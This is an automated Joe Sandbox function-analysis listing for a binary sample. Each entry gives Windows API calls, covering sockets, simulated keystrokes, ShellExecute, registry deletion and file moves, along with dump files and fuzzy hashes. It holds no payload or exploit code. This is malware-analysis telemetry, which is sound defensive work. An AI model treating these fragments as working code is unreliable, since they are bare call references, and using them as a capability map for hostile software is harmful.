                                                                                                                    • API String ID: 3864802216-0
                                                                                                                    • Opcode ID: f80fad9b76ced00dde15d28c78a3756bc815ba787c6fc5ef50e01362b1c5b29d
                                                                                                                    • Instruction ID: 995bc9679581d3516b063747098ba644dc16c1d63fd4f593374010417a302378
                                                                                                                    • Opcode Fuzzy Hash: f80fad9b76ced00dde15d28c78a3756bc815ba787c6fc5ef50e01362b1c5b29d
                                                                                                                    • Instruction Fuzzy Hash: C2317C72601210BFEB128F54CC8AFEB3BADEF49765F054065FE08DA292C6B59C41CB60
                                                                                                                    Function 0030BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2931989736-0
                                                                                                                    • Opcode ID: fb3ac51ccc245f9aaf83ba14aedcf380ef8146dd8cc0221d513058ebf9afcd65
                                                                                                                    • Instruction ID: 39399aabe26fa29d4717eed6ee37ee2a2fcf6bf1938205317cdea4361a1fbcf7
                                                                                                                    • Opcode Fuzzy Hash: fb3ac51ccc245f9aaf83ba14aedcf380ef8146dd8cc0221d513058ebf9afcd65
                                                                                                                    • Instruction Fuzzy Hash: 7321F6616022057BF207A6119D62FFBF39C9E15388F054021FD05AABC7FB24EE3185A1
                                                                                                                    Function 0031EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
                                                                                                                      • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
                                                                                                                      • Part of subcall function 002CFC86: _wcscpy.LIBCMT ref: 002CFCA9
                                                                                                                    • _wcstok.LIBCMT ref: 0031EC94
                                                                                                                    • _wcscpy.LIBCMT ref: 0031ED23
                                                                                                                    • _memset.LIBCMT ref: 0031ED56
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                    • String ID: X
                                                                                                                    • API String ID: 774024439-3081909835
                                                                                                                    • Opcode ID: 264363b4fe6283e6db8a66249b34f08082b5863a8cc09b61e4592caef21d63d9
                                                                                                                    • Instruction ID: 0c8a65f4f15716514693e8be1b7e4d09403358961e45aed643b96f1d8022e396
                                                                                                                    • Opcode Fuzzy Hash: 264363b4fe6283e6db8a66249b34f08082b5863a8cc09b61e4592caef21d63d9
                                                                                                                    • Instruction Fuzzy Hash: DEC181315187019FC719EF24C881A9AB7E4BF89354F00492DFD999B2A1DB31EC95CF92
                                                                                                                    Function 00326B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00326C00
                                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00326C21
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00326C34
                                                                                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 00326CEA
                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 00326CA7
                                                                                                                      • Part of subcall function 0030A7E9: _strlen.LIBCMT ref: 0030A7F3
                                                                                                                      • Part of subcall function 0030A7E9: _memmove.LIBCMT ref: 0030A815
                                                                                                                    • _strlen.LIBCMT ref: 00326D44
                                                                                                                    • _memmove.LIBCMT ref: 00326DAD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3619996494-0
                                                                                                                    • Opcode ID: 9d9e98fedc9b4535daee218dfe93313e8c6be0393c6aed4251263e60708b00db
                                                                                                                    • Instruction ID: 03f00cfc5a7a02db6c17fc765899cda082520f926612c8d1f7ea7c8c1c47b1f3
                                                                                                                    • Opcode Fuzzy Hash: 9d9e98fedc9b4535daee218dfe93313e8c6be0393c6aed4251263e60708b00db
                                                                                                                    • Instruction Fuzzy Hash: BE81F171608310AFC711EF24DC92FAAB7A8AF84714F54491DF9559B2E2DB70ED00CB91
                                                                                                                    Function 002B1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 529540e5cbd15c8f035e3d8e232de13e527ce09381651ed21dc51267fea97351
                                                                                                                    • Instruction ID: 02d8aabc6e36eecb133cd6e539ebf0340dfb51764be42088ed947915072099eb
                                                                                                                    • Opcode Fuzzy Hash: 529540e5cbd15c8f035e3d8e232de13e527ce09381651ed21dc51267fea97351
                                                                                                                    • Instruction Fuzzy Hash: B4717C30920109EFCB159F99CC98AFFBB78FF85350F508149F915AA251C730AA61CFA0
                                                                                                                    Function 0033B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsWindow.USER32(00F75548), ref: 0033B3EB
                                                                                                                    • IsWindowEnabled.USER32(00F75548), ref: 0033B3F7
                                                                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0033B4DB
                                                                                                                    • SendMessageW.USER32(00F75548,000000B0,?,?), ref: 0033B512
                                                                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 0033B54F
                                                                                                                    • GetWindowLongW.USER32(00F75548,000000EC), ref: 0033B571
                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0033B589
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4072528602-0
                                                                                                                    • Opcode ID: ff332efe70378d150b3acbca0a3785ae8858b583c2824eaeb215ef837a4a9eda
                                                                                                                    • Instruction ID: ae9b609e197546ee13319b0f296316a527903f3a37243859b67803a2ead132fa
                                                                                                                    • Opcode Fuzzy Hash: ff332efe70378d150b3acbca0a3785ae8858b583c2824eaeb215ef837a4a9eda
                                                                                                                    • Instruction Fuzzy Hash: 78718E38604204EFEB27DF55C8D5FBAFBB9EF09310F158059EA85972A2C771A940CB54
                                                                                                                    Function 0032F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0032F448
                                                                                                                    • _memset.LIBCMT ref: 0032F511
                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0032F556
                                                                                                                      • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
                                                                                                                      • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
                                                                                                                      • Part of subcall function 002CFC86: _wcscpy.LIBCMT ref: 002CFCA9
                                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 0032F5CD
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0032F5FC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 3522835683-2766056989
                                                                                                                    • Opcode ID: 089c6a9c4897670fd9774bc1982b4d8c68486a592edd64090e4e70736de64615
                                                                                                                    • Instruction ID: b61da1947192c26e49a3ebc60b9170660db1a71011b9d22f0dcefa77020f69b2
                                                                                                                    • Opcode Fuzzy Hash: 089c6a9c4897670fd9774bc1982b4d8c68486a592edd64090e4e70736de64615
                                                                                                                    • Instruction Fuzzy Hash: 9961BF75A10629DFCB05EF64D8819AEBBF5FF49310F148069E85AAB361CB30AD51CF90
                                                                                                                    Function 00310F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(?), ref: 00310F8C
                                                                                                                    • GetKeyboardState.USER32(?), ref: 00310FA1
                                                                                                                    • SetKeyboardState.USER32(?), ref: 00311002
                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00311030
                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0031104F
                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00311095
                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003110B8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    • Opcode ID: f4fe0f76afef708ce98a9a23f3e43728c7236df020ebada733e89806c0eb1483
                                                                                                                    • Instruction ID: ca8389a9383ae1e6369963f90454ec3d66fd39cc9e613b8074b4d1244e5d4bed
                                                                                                                    • Opcode Fuzzy Hash: f4fe0f76afef708ce98a9a23f3e43728c7236df020ebada733e89806c0eb1483
                                                                                                                    • Instruction Fuzzy Hash: 8651D3A09047D53DFB3B46348C46BF6BFA95B0E304F098589E2D4898D2C2E9ECD5D751
                                                                                                                    Function 00310D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(00000000), ref: 00310DA5
                                                                                                                    • GetKeyboardState.USER32(?), ref: 00310DBA
                                                                                                                    • SetKeyboardState.USER32(?), ref: 00310E1B
                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00310E47
                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00310E64
                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00310EA8
                                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00310EC9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    • Opcode ID: b54d71524c8d81dfe2b95a017ac91aa5720ebd1220d4ac76326e18c880cbd76c
                                                                                                                    • Instruction ID: 82a375259dacf7f67305086faef9e2b7603ea3d3ab114fea3f9e34d669d9937d
                                                                                                                    • Opcode Fuzzy Hash: b54d71524c8d81dfe2b95a017ac91aa5720ebd1220d4ac76326e18c880cbd76c
                                                                                                                    • Instruction Fuzzy Hash: 6251E5A0504BD57DFB3F83758C55BFABEA96B0A300F098889E1D45A8C2C3D5ACD5D760
                                                                                                                    Function 003155FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsncpy$LocalTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2945705084-0
                                                                                                                    • Opcode ID: 5f7568659f1b8a78acaf8dfbac3bf30cb9cb4fb1d771727ceb7f84df3dd9695a
                                                                                                                    • Instruction ID: a609c587d6c9f2eec368955eb2aa50643c4c80d772bb1dad4acf7bba5483f0e7
                                                                                                                    • Opcode Fuzzy Hash: 5f7568659f1b8a78acaf8dfbac3bf30cb9cb4fb1d771727ceb7f84df3dd9695a
                                                                                                                    • Instruction Fuzzy Hash: 7B41C765C20214B6CB16EBB4CC46ACFB3B89F48310F504857E518E3361FB35A6A5CBE6
                                                                                                                    Function 0030D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0030D5D4
                                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0030D60A
                                                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0030D61B
                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0030D69D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                    • String ID: ,,4$DllGetClassObject
                                                                                                                    • API String ID: 753597075-733645947
                                                                                                                    • Opcode ID: dcfb0b717cb76c1651396713fb3a63ef104703a52b423166e184d7b35544fd96
                                                                                                                    • Instruction ID: 6ca247009a2169180d769230b3c42d5667a5e2eeeb97d114485acad501d75611
                                                                                                                    • Opcode Fuzzy Hash: dcfb0b717cb76c1651396713fb3a63ef104703a52b423166e184d7b35544fd96
                                                                                                                    • Instruction Fuzzy Hash: B24182B1601208EFDF06CF94C894A9ABBF9EF44314F5581A9ED099F245D7B2DD44CBA0
                                                                                                                    Function 00313671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0031466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00313697,?), ref: 0031468B
                                                                                                                      • Part of subcall function 0031466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00313697,?), ref: 003146A4
                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 003136B7
                                                                                                                    • _wcscmp.LIBCMT ref: 003136D3
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 003136EB
                                                                                                                    • _wcscat.LIBCMT ref: 00313733
                                                                                                                    • SHFileOperationW.SHELL32(?), ref: 0031379F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 1377345388-1173974218
                                                                                                                    • Opcode ID: 33620d850b70548cd95d7584352e886a0996be7f826ebe8efecbcc1f8420756c
                                                                                                                    • Instruction ID: 86085490fc79e31082ff4681bb1cc924eadb334686c7746b8a83532b67c1d9f9
                                                                                                                    • Opcode Fuzzy Hash: 33620d850b70548cd95d7584352e886a0996be7f826ebe8efecbcc1f8420756c
                                                                                                                    • Instruction Fuzzy Hash: 5B41A271508344AEC756EF64D4919DFB7ECAF8C380F40092EF489C7291EA34D689CB52
                                                                                                                    Function 00337291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 003372AA
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00337351
                                                                                                                    • IsMenu.USER32(?), ref: 00337369
                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003373B1
                                                                                                                    • DrawMenuBar.USER32 ref: 003373C4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 3866635326-4108050209
                                                                                                                    • Opcode ID: d41fa4f17f65ec9bf4c5a7ed4de2da25dae0bdb11fedd6c6121bfbc82403e185
                                                                                                                    • Instruction ID: 6b07815904edb4062fcdbc3e34e6274192ec5c907c6786707224f2e4b3c7f579
                                                                                                                    • Opcode Fuzzy Hash: d41fa4f17f65ec9bf4c5a7ed4de2da25dae0bdb11fedd6c6121bfbc82403e185
                                                                                                                    • Instruction Fuzzy Hash: 4E4125B9A05209EFDB22DF50D884E9ABBB8FB09320F158429FD55A7260D730AD50DF90
                                                                                                                    Function 00330FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00330FD4
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00330FFE
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 003310B5
                                                                                                                      • Part of subcall function 00330FA5: RegCloseKey.ADVAPI32(?), ref: 0033101B
                                                                                                                      • Part of subcall function 00330FA5: FreeLibrary.KERNEL32(?), ref: 0033106D
                                                                                                                      • Part of subcall function 00330FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00331090
                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00331058
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 395352322-0
                                                                                                                    • Opcode ID: aa1f117d08b28f651ec0b81e50e64b17cf6a3365d721f669136f0e41b1b897de
                                                                                                                    • Instruction ID: f0ed8cf9f20623331db0ca18841ee6663049d5db9c760c997cb7e31c1c03ca11
                                                                                                                    • Opcode Fuzzy Hash: aa1f117d08b28f651ec0b81e50e64b17cf6a3365d721f669136f0e41b1b897de
                                                                                                                    • Instruction Fuzzy Hash: F7310D71D01109BFDB1A9F94DCC9EFFB7BCEF08300F40016AE501A2151EA749E899AA0
                                                                                                                    Function 003362CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003362EC
                                                                                                                    • GetWindowLongW.USER32(00F75548,000000F0), ref: 0033631F
                                                                                                                    • GetWindowLongW.USER32(00F75548,000000F0), ref: 00336354
                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00336386
                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003363B0
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 003363C1
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003363DB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
